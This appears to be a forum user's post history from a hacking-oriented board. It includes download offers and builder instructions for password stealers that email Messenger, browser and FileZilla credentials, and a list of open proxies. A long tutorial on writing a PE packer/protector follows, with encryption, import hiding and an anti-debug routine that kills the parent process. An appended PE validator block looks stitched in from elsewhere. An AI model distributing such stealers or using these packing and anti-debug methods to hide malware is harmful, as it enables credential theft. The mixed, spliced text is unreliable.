Nytro

Administrators
  • Posts: 18725
  • Days Won: 706
Everything posted by Nytro

  1. TGS msn stealer! by SqUeEzEr
     It's an MSN stealer with only 8,50KB of code UNCOMPRESSED (and the settings are even crypted xD). It emails you the stored passwords of Windows Live Messenger.
     [usage] You have to open Builder.exe, fill in your information and press patch. Stub.exe should be in the same folder. Be sure you use a valid GMAIL account, otherwise you will get an error message.
     Download: http://www.2shared.com/file/7104327/4650c23/Stealer.html
  2. Math sucks... Post something that has nothing to do with math too. There's still a while until school starts.
  3. 194.212.94.23:8000 212.113.5.2:80 212.96.165.178:3128 222.240.141.4:8080 218.56.64.210:3128 200.165.90.110:8080 201.89.168.155:8080 201.91.0.9:3128 202.116.160.89:80 202.131.94.58:808 200.74.156.108:8080 202.63.97.35:8080 210.51.184.62:80 222.124.194.228:8080 222.124.2.106:8080 222.127.147.83:8080 60.191.241.38:8088 217.150.32.86:80 61.147.120.247:8080 58.68.125.75:80 61.186.94.152:3128 81.174.70.141:32123 80.249.185.2:3128 64.94.90.22:80 67.69.254.245:80 82.145.197.249:8080 211.239.124.67:6188 97.65.164.215:8080 200.168.234.1:8080 200.168.234.10:8080 200.168.234.99:8080 203.202.255.110:8080 211.90.22.106:8088 219.150.228.182:1080 195.139.235.200:80 222.215.71.132:1080 218.56.64.210:8080 202.129.189.66:8080 203.148.85.154:8080 203.160.1.103:80 203.160.1.121:80 203.160.1.94:80 64.76.22.106:8080 64.76.22.126:8080 220.227.250.254:8080 61.178.74.39:1080 67.69.254.250:80 79.127.144.2:8080 117.102.94.190:3128 203.199.215.115:8080 118.175.15.34:8080 219.93.178.162:3128 41.196.183.58:80 201.198.34.214:8080 189.89.16.82:3128 190.144.127.202:3128 201.53.63.168:3128 218.75.100.114:8080 202.133.82.120:8080 219.101.35.83:3128 64.76.22.108:8080 67.69.254.246:80 121.12.249.207:1080 203.112.205.194:80 74.53.185.131:8080 86.101.185.98:8080 74.86.24.76:3128 74.92.229.74:8089 81.180.75.142:8080 81.208.114.227:8080 114.127.246.36:80 195.229.62.157:8080 210.5.71.130:8080 211.162.78.178:80 146.83.8.31:8080 148.75.13.143:8080 202.131.98.165:80 202.148.31.170:3126 196.213.208.150:80 202.44.4.85:8081 200.249.150.55:3128 200.41.230.105:3128
  4. Make your own PE Protector

Part 1: Your first EXE Protector

Download source files - 128 Kb
Download demo project - 100 Kb

Preface

This article was written to provide a better understanding to people who do not have any experience in this field. I am not going to describe the PE structure, since I think it was explained well enough in Matt Pietrek's articles in MSDN. I strongly recommend reading his articles before continuing with this one if you don't have any previous experience with the PE structure. You can find the relevant reference links at the end of the article.

This article will appear in three parts:

Your first EXE Protector: This part will describe how to make a powerful EXE protector and packer using Visual C++ Win32 programming.

Support OCX, DLL, and SCR: This part will introduce how to include other PE types in addition to the EXE file type. It will explain some tricks which you should know for OCX and DLL protecting.

Use Cryptography API: This part will demonstrate how to use Microsoft Cryptography API functions to encrypt and decrypt PE section information.

This article contains yoda's Protector source from version 1.01 to 1.03. It is the first time people can look at its source after six months of its appearance on the web. It is based on [6] yoda's Crypter assembly source by Danilo Bzdok, compression source from [7] the UPX library by Markus F.X.J. Oberhumer & Laszlo Molnar, and [9] the aPLib compression library by Joergen Ibsen. Thus, we should appreciate them for helping me to create this tool. I am also grateful to the people who tried and tested it on different Windows versions around the world. I think this article will be a small present to all the people who were involved in and assisted with making yoda's Protector.

Contents

Introduction
A short aspect about PE Structure
Open PE files
Verify if PE file is valid
Make Extra Section
Pack and Crypt Sections
Build Import Table Directory
Reload Import Table and API Redirection
Anti-debug methods
Eliminate unnecessary data
Sample code
Conclusion
References

Introduction

The Portable Executable format is the standard format under the Microsoft Windows NT® operating system. It contains information for code, data, resources, and dynamic link library importation. It is modifiable using recent powerful debuggers such as OllyDbg or SoftICE with a little knowledge of assembly language. This causes software development companies to waste the time they spent on earning money from their products. Therefore, they are led to purchase tools like EXE protectors to prevent illegal copying. My idea is: what will happen if every person has their own EXE protector? A cracker will face a different EXE protector with different methods each time. Thus, I think every one of us can have their own EXE protector.

A short aspect about PE Structure

The Portable Executable includes information for MS-DOS, for Windows NT, and the Sections. This information is provided for the Windows operating system to allocate memory, import dynamic link libraries, and execute code.

Table-1
    MS-DOS information:      IMAGE_DOS_HEADER
                             MS-DOS Stub Program
    Windows NT information:  PE Signature ("PE")
                             IMAGE_FILE_HEADER
                             IMAGE_OPTIONAL_HEADER
    Sections information:    IMAGE_SECTION_HEADER[0] ... IMAGE_SECTION_HEADER[n]
                             SECTION[0] ... SECTION[n]

You can find more about the PE file format in [1] "Microsoft Portable Executable and Common Object File Format Specification". Matt Pietrek clarifies it well enough in [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", and [3a/b] "An In-Depth Look into the Win32 Portable Executable File Format". Moreover, PEView [4] by Wayne J. Radburn will help you to find out all aspects of the PE file format.

Figure-1: PEview (image: http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/peview.gif)

All the required data structures for the PE file format are in the <winnt.h> file included with your Visual C++. The IMAGE_DOS_HEADER, IMAGE_NT_HEADERS and IMAGE_SECTION_HEADER structures represent all you need to work with the PE file format. The relevant information for these structures can be found in the [5] MSDN library.

Open PE files

We have to load the PE file into memory to work with its information. Some Windows API functions help us do it very easily: CreateFile(), GetFileSize(), GlobalAlloc(), ReadFile(), CloseHandle(). I made a class to work with PE files. It helps me to open files and put the DOS header, NT headers, Section Headers, and Sections into separate places in memory and then rebuild them all in the form of a new PE file.

    class PEStructure
    {
    private:
        DWORD ReservedHeaderSize;
        DWORD ReservedHeaderRO;
    public:
        DWORD dwRO_first_section;
        IMAGE_DOS_HEADER image_dos_header;
        char *reservedheader;
        IMAGE_NT_HEADERS image_nt_headers;
        IMAGE_SECTION_HEADER image_section_header[MAX_SECTION_NUM];
        char *image_section[MAX_SECTION_NUM];

        void OpenFileName(char* FileName);
        void UpdateHeaders(BOOL bSaveAndValidate);
        void UpdateHeadersSections(BOOL bSaveAndValidate);
        void Free();
    };

OpenFileName() will open PE files and place them in image_dos_header, reservedheader, image_nt_headers, image_section_header[], and image_section[]. All PE structures are abstracted by this function in my tool.

    void PEStructure::OpenFileName(char* FileName)
    {
        hFile=CreateFile(FileName, GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ,
                         NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if(hFile==INVALID_HANDLE_VALUE)
        {
            ShowErr(FileErr);
            return;
        }
        dwFsize=GetFileSize(hFile,0);
        if(dwFsize == 0)
        {
            CloseHandle(hFile);
            ShowErr(FsizeErr);
            return;
        }
        // room for the original file, the new import table, the loader code and alignment padding
        dwOutPutSize=dwFsize+IT_SIZE+DEPACKER_CODE_SIZE+ALIGN_CORRECTION;
        pMem=(char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,dwOutPutSize);
        if(pMem == NULL)
        {
            CloseHandle(hFile);
            ShowErr(MemErr);
            return;
        }
        ReadFile(hFile,pMem,dwFsize,&dwBytesRead,NULL);
        CloseHandle(hFile);
        CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER));
        ReservedHeaderRO=sizeof(IMAGE_DOS_HEADER);
        // bytes between the DOS header and the NT headers (DOS stub etc.)
        ReservedHeaderSize=image_dos_header.e_lfanew-sizeof(IMAGE_DOS_HEADER);
        reservedheader=new TCHAR[ReservedHeaderSize];
        CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS));
        dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS);
        UpdateHeadersSections(TRUE);
    }

Verify if PE file is valid

It is important to verify that the file is a Win32 Portable Executable by checking e_magic of image_dos_header and the Signature of image_nt_headers, to prevent unpredictable faults.

    if(PEfile.image_dos_header.e_magic!='ZM')
    {
        GlobalFree(pMem);
        CloseHandle(hFile);
        if(MakeBackup) DeleteFile(szFnameBackup);
        ShowErr(PEErr);
        return;
    }
    if(PEfile.image_nt_headers.Signature!='EP')
    {
        GlobalFree(pMem);
        CloseHandle(hFile);
        if(MakeBackup) DeleteFile(szFnameBackup);
        ShowErr(PEErr);
        return;
    }

Make Extra Section

There is a trick inside yoda's Protector to create an extra section for protection and unpacking purposes. Visual C++ makes it possible to create this extra part without using an assembler and linker. If you look at the PE_LOADER_CODE() subroutine inside CryptStuff.cpp you will find what I am talking about. This is the same method used by Danilo Bzdok in his [6] yoda's Crypter. Of course, he did it only using assembly language in MASM32 without any high level language. I made GetFunctionRVA(), GetFunctionSize() and CopyFunction() to rob the code from PE_LOADER_CODE() and use it to create an additional section for the target PE file.

    DWORD GetFunctionRVA(void* FuncName)
    {
        void *_tempFuncName=FuncName;
        char *ptempFuncName=PCHAR(_tempFuncName);
        DWORD _jmpdwRVA,dwRVA;
        // the function pointer lands on a 5-byte JMP thunk; follow its rel32 to the real body
        CopyMemory(&_jmpdwRVA,ptempFuncName+1,4);
        dwRVA=DWORD(ptempFuncName)+_jmpdwRVA+5;
        return(dwRVA);
    }

    DWORD GetFunctionSize(void* FuncName)
    {
        DWORD dwRVA=GetFunctionRVA(FuncName);
        char* pFuncBody=PCHAR(dwRVA);
        UCHAR _temp;
        bool notEnd=TRUE;
        char *DepackerCodeEnd=new TCHAR[10];
        DWORD l=0;
        do
        {
            CopyMemory(&_temp,pFuncBody+l,1);
            if(_temp==0xC3)   // RET: check whether the key word follows it
            {
                CopyMemory(DepackerCodeEnd,pFuncBody+l+0x01,10);
                DepackerCodeEnd[9]=0x00;
                if(strcmp(DepackerCodeEnd,"ETGXZKATZ")==0)
                {
                    notEnd=FALSE;
                }
            }
            l++;
        }while(notEnd);
        return(l);
    }

GetFunctionRVA() seeks the Relative Virtual Address of a specific subroutine for use by GetFunctionSize() and CopyFunction(). GetFunctionSize() returns the size of the target routine to be used by CopyFunction(). It searches for a key word ("ETGXZKATZ") to calculate the routine size. Finally, CopyFunction() is a complete routine to steal all the code from the PE_LOADER_CODE() subroutine and place it in the packed PE file.

    char* CopyFunction(void* FuncName)
    {
        DWORD dwRVA=GetFunctionRVA(FuncName);
        DWORD dwSize=GetFunctionSize(FuncName);
        char* pFuncBody=PCHAR(dwRVA);
        char* filebuff=new TCHAR[dwSize+1];
        CopyMemory(filebuff,pFuncBody,dwSize);
        return(filebuff);
    }

This method is illustrated in the following code:

    char *pDepackerCode;
    DWORD DEPACKER_CODE_SIZE;
    :
    DEPACKER_CODE_SIZE=GetFunctionSize(PE_LOADER_CODE);
    pDepackerCode=new TCHAR[DEPACKER_CODE_SIZE];
    pDepackerCode=CopyFunction(PE_LOADER_CODE);
    :
    void PE_LOADER_CODE()
    {
        _asm
        {
            //--------------------------------------------------
            //---------- START OF THE PE LOADER CODE -----------
            DepackerCode:
            :
            :
            :
            DepackerCodeEND:
            RET
            //"ETGXZKATZ" <<-- KEY WORD (each opcode byte is one ASCII letter)
            INC EBP  //'E'
            PUSH ESP //'T'
            INC EDI  //'G'
            POP EAX  //'X'
            POP EDX  //'Z'
            DEC EBX  //'K'
            INC ECX  //'A'
            PUSH ESP //'T'
            POP EDX  //'Z'
        }
    }

Pack and Crypt Sections

The UPX compressor source code [7] is an alternative choice to pack the sections of PE files. I use the [8] LZO data compression library by Markus F.X.J. Oberhumer to pack the code and data sections. The polymorphic encryption and decryption method [6] by Danilo Bzdok is simple and good enough to crypt PE sections, with some modifications in C++, as you can see inside EncryptBuff() and DecryptBuff() in PER.CPP. This protector separates the sections into different allocated parts of memory. Afterwards it packs and crypts parts of the sections with CompressPE() and CryptPE().

    //------ ENCRYPT THE SECTIONS -----
    // generate PER
    PEfile.UpdateHeadersSections(TRUE);
    SecEncryptBuff=new TCHAR[SEC_PER_SIZE];
    SecDecryptBuff=new TCHAR[SEC_PER_SIZE];
    MakePER(SecEncryptBuff,SecDecryptBuff,SEC_PER_SIZE);
    // patch the matching decrypt routine into the loader code
    CopyMemory(pDepackerCode+dwRO_SEC_DECRYPT, SecDecryptBuff, SEC_PER_SIZE);
    // encrypt !
    CompressPE(pMem);
    CryptPE(pMem);
    RemoveSectionNames(pMem);
    newsection.Misc.VirtualSize=DepackCodeVirtualSize+0x2000;
    PEfile.image_section_header[PEfile.image_nt_headers.FileHeader.NumberOfSections-1]
        .Misc.VirtualSize = newsection.Misc.VirtualSize;
    PEfile.UpdateHeadersSections(FALSE);
    //---------------------------------

The LZO data compression library [8] has compressor source in C++ and also decompressor source in both C++ and assembly. Hence, we have all the sources to pack in a high level language and unpack in a low level language. I used lzo1x_999_compress_level() from the LZO library to compress sections inside CompressPE() and its assembly source lzo1f_decompress_asm_fast_safe() to decompress sections inside _DecompressPE() in the assembly source of PE_LOADER_CODE().

It is important to pay attention to image_nt_headers.OptionalHeader.SectionAlignment and image_nt_headers.OptionalHeader.FileAlignment to prevent the Win32 incompatible file error in Windows versions above Windows 98. The variables in IMAGE_SECTION_HEADER should be adapted to the file alignment and section alignment. I reserved the UpdateHeadersSections() function to retrieve and rebuild all PE file format structures.

    void PEStructure::UpdateHeadersSections(BOOL bSaveAndValidate)
    {
        DWORD i;
        if(bSaveAndValidate)//TRUE = data is being retrieved
        {
            DWORD SectionNum = PEfile.image_nt_headers.FileHeader.NumberOfSections;
            CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER));
            ReservedHeaderSize = image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER);
            if((ReservedHeaderSize&0x80000000)==0x00000000)
            {
                CopyMemory(reservedheader, pMem+ReservedHeaderRO, ReservedHeaderSize);
            }
            CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS));
            dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS);
            CopyMemory(&image_section_header, pMem+dwRO_first_section,
                       SectionNum*sizeof(IMAGE_SECTION_HEADER));
            for(i=0;i< SectionNum;i++)
            {
                // each section body gets its own file-aligned buffer
                image_section[i] = (char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,
                    PEAlign(image_section_header[i].SizeOfRawData,
                            PEfile.image_nt_headers.OptionalHeader.FileAlignment));
                CopyMemory(image_section[i],
                           pMem + image_section_header[i].PointerToRawData,
                           image_section_header[i].SizeOfRawData);
            }
        }
        else//FALSE = data is being initialized
        {
            DWORD SectionNum = PEfile.image_nt_headers.FileHeader.NumberOfSections;
            CopyMemory(pMem, &image_dos_header,sizeof(IMAGE_DOS_HEADER));
            ReservedHeaderSize=image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER);
            if((ReservedHeaderSize&0x80000000)==0x00000000)
            {
                CopyMemory(pMem + ReservedHeaderRO, reservedheader, ReservedHeaderSize);
            }
            CopyMemory(pMem+image_dos_header.e_lfanew, &image_nt_headers, sizeof(IMAGE_NT_HEADERS));
            dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS);
            CopyMemory(pMem+dwRO_first_section, &image_section_header,
                       SectionNum*sizeof(IMAGE_SECTION_HEADER));
            for(i=0;i< SectionNum;i++)
            {
                CopyMemory(pMem+image_section_header[i].PointerToRawData,
                           image_section[i],
                           image_section_header[i].SizeOfRawData);
            }
        }
    }

Build Import Table Directory

The PE unpack section needs to import two essential API functions to dynamically load all the other API functions at run time. LoadLibraryA() and GetProcAddress() from Kernel32.dll are the vital functions for importing other API functions with some tricky methods. AssembleIT() is reserved to undertake this task. We should change the import table address and size to point to the new import table directory inside the extra section. To retrieve the old import table, it has to reload and rebuild the import table directory in the next step before executing the program code. The loader section uses LoadLibraryA() and GetProcAddress() to seek the relative virtual addresses of the imported functions of the dynamic link libraries.

Table-2
    Import Table Address  -> "Kernel32.dll", 0x00
                             LoadLibrary_RVA
                             GetProcessAddres_RVA
                             0x00, 0x00
    LoadLibrary_RVA       -> 0x00, 0x00, "LoadLibraryA"
    GetProcessAddres_RVA  -> 0x00, 0x00, "GetProcAddress"

Reload Import Table and API Redirection

It is important to protect the import table directory from the reverse engineering process. Danilo Bzdok used technical methods to destroy the import thunk data and crypt the import information in [6] yoda's Crypter. This part is retrievable again by the loader code section. I applied his methods in my PE Protector, bringing some parts of the code to C and keeping the other parts in assembly. ProcessOrgIT() provides all we need for our purpose. In the loader section, the INIT_IMPORT_TABLE() routine implements our approach to API redirection and import table rebuilding.

Anti-debug methods

A PE Protector should be able to detect whether the program is being debugged and prevent debugging. OllyDbg and SoftICE are two important debuggers that can bypass many tricks which cause debuggers to halt. However, I should introduce some simple methods to detect debuggers. I know all of these methods do not have any effect against the recently added plug-ins for the mentioned debuggers.

1. IsDebuggerPresent Windows API: IsDebuggerPresent() will return a non-zero value whenever the current process is running in the context of a debugger.

2. SoftICE detection: It can find the SoftICE debugger by checking whether the NTICE driver on Windows NT or the SICE driver on Windows 98 is active.

    if(CreateFile("\\\\.\\NTICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                  NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE)
    {
        // There is SoftICE NT on your system
    }
    if(CreateFile("\\\\.\\SICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                  NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE)
    {
        // There is SoftICE98 on your system
    }

3. Probe Processes: Sometimes it is necessary to search for a specific process or to isolate a particular process. The sample source code demonstrates how to find the parent process, check whether it is EXPLORER.EXE, and kill every parent process except the Explorer window. There is both C++ and assembly code inside CryptStuff.CPP to illustrate this task.

    void GetFileNameFromPath(char* szSource)
    {
        char *szTemp=strrchr(szSource,'\\');
        if(szTemp!=NULL)
        {
            szTemp++;
            DWORD l=DWORD(strlen(szTemp))+1;
            CopyMemory(szSource,szTemp,l);
        }
    }

    void AntiDebug()
    {
        char lpszSystemInfo[MAX_PATH];
        HANDLE hSnapshot=NULL;
        DWORD PID_child;
        DWORD PID_parent=0,PID_explorer=0;
        HANDLE hh_parnet = NULL;
        PROCESSENTRY32 pe32 = {0};
        pe32.dwSize = sizeof(PROCESSENTRY32);//0x128;
        PID_child=GetCurrentProcessId();//getpid();
        hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
        if (Process32First(hSnapshot, &pe32))
        {
            while (Process32Next(hSnapshot, &pe32))
            {
                GetFileNameFromPath(pe32.szExeFile);
                CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile));
                if(strcmp(pe32.szExeFile,"EXPLORER.EXE")==0)
                {
                    PID_explorer=pe32.th32ProcessID;
                }
                if(pe32.th32ProcessID==PID_child)
                {
                    PID_parent=pe32.th32ParentProcessID;
                }
            }
        }
        if(PID_parent!=PID_explorer)
        {
            // parent is not Explorer: assume a debugger launched us and terminate it
            hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_parent);
            TerminateProcess(hh_parnet, 0);
        }
        else
        {
            MODULEENTRY32 me32 = {0};
            me32.dwSize = sizeof(MODULEENTRY32);
            hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, PID_explorer);
            if (Module32First(hSnapshot, &me32))
            {
                do
                {
                    if(PID_explorer==me32.th32ProcessID)
                    {
                        // the buffer is MAX_PATH bytes, so pass exactly that size
                        GetWindowsDirectory(lpszSystemInfo, MAX_PATH);
                        strcat(lpszSystemInfo,"\\");
                        strcat(lpszSystemInfo,"EXPLORER.EXE");
                        CharUpperBuff(me32.szExePath, strlen(me32.szExePath));
                        // an "EXPLORER.EXE" that does not live in the Windows directory is not the real shell
                        if(strncmp(me32.szExePath, lpszSystemInfo, strlen(lpszSystemInfo)))
                        {
                            GetFileNameFromPath(me32.szExePath);
                            if(strcmp(me32.szExePath, "EXPLORER.EXE")==0)
                            {
                                hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_explorer);
                                TerminateProcess(hh_parnet, 0);
                            }
                        }
                    }
                }while (Module32Next(hSnapshot, &me32));
            }
        }
    }

This code will not work under Windows NT 4.0 because of the absence of CreateToolhelp32Snapshot(), Process32First(), Process32Next(), Module32First(), Module32Next(). But all of these API functions can be built from the undocumented API functions in NTDLL.DLL. You can take a look at [10] "Windows NT (2000) Native API reference" by Gary Nebbett. Furthermore, I recommend using [11] Process Explorer by Mark Russinovich to explore all running processes on your system. It will help you understand them better.

Figure-2: Process Explorer (image: http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/procexp.gif)

Eliminate unnecessary data

Sometimes you need to clean out all unnecessary data such as debug information and the relocation section, make a small DOS header, and remove the MS-DOS stub program. You should reserve these items in your PE Protector with some considerations. For instance, the relocation section does not have any effect on running EXE files, but it plays an important role in OLE/ActiveX controls and dynamic link libraries.

Sample code

The project compiles with Visual C++ .NET 2003 and doesn't require any extra tools. It works under all Windows versions except Windows NT 4.0 and Windows 95.

Conclusion

This article and its source could be an introduction to PE protector tools and a demonstration of how these tools work. I hope it fills the absence of this kind of interesting topic and tool in the open source area.

References

[1] "Microsoft Portable Executable and Common Object File Format Specification", Microsoft Corporation, Revision 6.0, February 1999
[2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", Matt Pietrek, MSDN Library, March 1994
[3a] "An In-Depth Look into the Win32 Portable Executable File Format", part 1, Matt Pietrek, MSDN Magazine, February 2002
[3b] "An In-Depth Look into the Win32 Portable Executable File Format", part 2, Matt Pietrek, MSDN Magazine, March 2002
[4] PEview Version 0.67, Wayne J. Radburn
[5] MSDN Library, Microsoft Corporation, April 2003
[6] yoda's Crypter, Danilo Bzdok
[7] UPX, the Ultimate Packer for eXecutables, Markus F.X.J. Oberhumer & Laszlo Molnar
[8] LZO real-time data compression library, Markus F.X.J. Oberhumer
[9] aPLib compression library, Joergen Ibsen
[10] "Windows NT (2000) Native API reference", Gary Nebbett
[11] Process Explorer, Mark Russinovich
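The article's validity check compares only e_magic and the NT Signature, and it follows e_lfanew before anyone has confirmed that it points inside the file; its alignment remarks likewise have no check behind them. The following validator is an added example, not code from the article or from yoda's Protector: it bounds-checks e_lfanew before dereferencing it, compares both signatures, checks that SectionAlignment and FileAlignment are powers of two with SectionAlignment >= FileAlignment, and verifies that every IMAGE_SECTION_HEADER and its PointerToRawData/SizeOfRawData range lie inside the buffer, which goes beyond the article's two-constant test. The minimal constants, the little-endian readers (used instead of winnt.h so the code compiles on any platform), the constructed one-section PE32 image and the names validate_pe, build_sample_pe and run_demo are all assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Minimal constants standing in for winnt.h (assumption: PE32 with the standard
   224-byte optional header; the offsets used below also hold for PE32+). */
#define IMAGE_DOS_SIGNATURE 0x5A4D      /* "MZ": the article's 'ZM' multi-char constant */
#define IMAGE_NT_SIGNATURE  0x00004550  /* "PE\0\0": the article's 'EP' */
#define DOS_HEADER_SIZE     64
#define FILE_HEADER_SIZE    20
#define SECTION_HEADER_SIZE 40

enum pe_status {
    PE_OK = 0,
    PE_ERR_SHORT,    /* buffer smaller than IMAGE_DOS_HEADER */
    PE_ERR_MZ,       /* e_magic is not "MZ" */
    PE_ERR_LFANEW,   /* e_lfanew points outside the buffer */
    PE_ERR_PE,       /* Signature is not "PE\0\0" */
    PE_ERR_ALIGN,    /* SectionAlignment / FileAlignment inconsistent */
    PE_ERR_SECTION   /* a section header or its raw data lies outside the buffer */
};

/* Little-endian field access: the untrusted buffer is never cast to a struct. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }
static int is_pow2(uint32_t v) { return v != 0 && (v & (v - 1)) == 0; }

/* Validates DOS header, NT signature, alignments and every section's raw range. */
enum pe_status validate_pe(const uint8_t *buf, size_t len) {
    if (len < DOS_HEADER_SIZE) return PE_ERR_SHORT;
    if (rd16(buf) != IMAGE_DOS_SIGNATURE) return PE_ERR_MZ;
    uint32_t e_lfanew = rd32(buf + 0x3C);
    /* need Signature + IMAGE_FILE_HEADER + optional header up to FileAlignment (offset 36..39) */
    if (e_lfanew < DOS_HEADER_SIZE || e_lfanew > len || len - e_lfanew < 4 + FILE_HEADER_SIZE + 40)
        return PE_ERR_LFANEW;
    const uint8_t *nt = buf + e_lfanew;
    if (rd32(nt) != IMAGE_NT_SIGNATURE) return PE_ERR_PE;
    uint16_t num_sections = rd16(nt + 4 + 2);   /* FileHeader.NumberOfSections */
    uint16_t opt_size     = rd16(nt + 4 + 16);  /* FileHeader.SizeOfOptionalHeader */
    const uint8_t *opt = nt + 4 + FILE_HEADER_SIZE;
    uint32_t section_align = rd32(opt + 32);    /* OptionalHeader.SectionAlignment */
    uint32_t file_align    = rd32(opt + 36);    /* OptionalHeader.FileAlignment */
    if (!is_pow2(section_align) || !is_pow2(file_align) || section_align < file_align)
        return PE_ERR_ALIGN;
    size_t sh_off = (size_t)e_lfanew + 4 + FILE_HEADER_SIZE + opt_size;
    for (uint16_t i = 0; i < num_sections; i++) {
        if (sh_off > len || len - sh_off < SECTION_HEADER_SIZE) return PE_ERR_SECTION;
        const uint8_t *sh = buf + sh_off;
        uint32_t raw_size = rd32(sh + 16);      /* SizeOfRawData */
        uint32_t raw_ptr  = rd32(sh + 20);      /* PointerToRawData */
        /* overflow-safe form of raw_ptr + raw_size <= len */
        if (raw_ptr > len || raw_size > len - raw_ptr) return PE_ERR_SECTION;
        sh_off += SECTION_HEADER_SIZE;
    }
    return PE_OK;
}

/* Builds a constructed, minimal PE32 image with one section; returns its length.
   The bytes are synthetic and are not taken from any real executable. */
size_t build_sample_pe(uint8_t *buf, size_t cap) {
    const size_t len = 0x400;
    if (cap < len) return 0;
    memset(buf, 0, len);
    wr16(buf, IMAGE_DOS_SIGNATURE);
    wr32(buf + 0x3C, DOS_HEADER_SIZE);          /* e_lfanew: NT headers follow the DOS header */
    uint8_t *nt = buf + DOS_HEADER_SIZE;
    wr32(nt, IMAGE_NT_SIGNATURE);
    wr16(nt + 4, 0x014C);                       /* Machine = i386 */
    wr16(nt + 6, 1);                            /* NumberOfSections */
    wr16(nt + 20, 224);                         /* SizeOfOptionalHeader (PE32) */
    uint8_t *opt = nt + 4 + FILE_HEADER_SIZE;
    wr16(opt, 0x10B);                           /* Magic = PE32 */
    wr32(opt + 32, 0x1000);                     /* SectionAlignment */
    wr32(opt + 36, 0x200);                      /* FileAlignment */
    uint8_t *sh = opt + 224;                    /* first IMAGE_SECTION_HEADER, at offset 312 */
    memcpy(sh, ".text", 5);
    wr32(sh + 8, 0x100);                        /* VirtualSize */
    wr32(sh + 12, 0x1000);                      /* VirtualAddress */
    wr32(sh + 16, 0x200);                       /* SizeOfRawData */
    wr32(sh + 20, 0x200);                       /* PointerToRawData: last byte is at 0x3FF */
    return len;
}

/* Runs the validator on the sample and on three corrupted copies; returns how
   many of the four checks gave the expected status (4 when everything works). */
int run_demo(void) {
    uint8_t img[0x400], bad[0x400];
    size_t n = build_sample_pe(img, sizeof img);
    int passed = 0;
    passed += (validate_pe(img, n) == PE_OK);
    memcpy(bad, img, n); wr32(bad + 0x3C, 0xFFFFFF00u);        /* e_lfanew outside the file */
    passed += (validate_pe(bad, n) == PE_ERR_LFANEW);
    memcpy(bad, img, n); wr32(bad + 312 + 16, 0x1000);         /* SizeOfRawData runs past EOF */
    passed += (validate_pe(bad, n) == PE_ERR_SECTION);
    memcpy(bad, img, n); wr32(bad + 64 + 24 + 36, 0x2000);     /* FileAlignment > SectionAlignment */
    passed += (validate_pe(bad, n) == PE_ERR_ALIGN);
    return passed;
}

int main(void) {
    printf("checks passed: %d of 4\n", run_demo());
    return 0;
}
```

The ordering matters: e_lfanew is read from the DOS header and range-checked against the buffer length before any byte at that offset is touched, and the raw-range test is written as a subtraction so that a 32-bit PointerToRawData plus SizeOfRawData cannot wrap around. A packer that rewrites section headers, as the article's UpdateHeadersSections() does, can run the same function over its own output to catch an alignment or raw-size mistake before Windows reports the file as an invalid Win32 application.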
  5. Steals: Firefox 3.x MSN +8.x IE 7.x Filezilla Download: http://www.2shared.com/file/7104013/2a6325a0/SeabraStealer01.html
  6. I repeat: I don't guarantee that they are not infected. In fact, I actually suspect some of them are infected. Moreover, I think the chances of finding something that works well are very slim.
  7. Let me see what I can manage; first I want to finish a tutorial I've started, but I think it will take a while. Then I'll help you with anything; there's no need for me to be a member, I don't do that kind of thing, but if I can help you I'll gladly help.
  8. http://bahoi.ro/?p=139
  9. Upload the files to a host, set the permissions of the folder they are in to 777, open the HTML page, press keys at random, then check in that folder whether a file with your IP has been created.
  10. Nytro

     Hello

     If you don't want a ban on this one too, look at the date of the last post before posting.
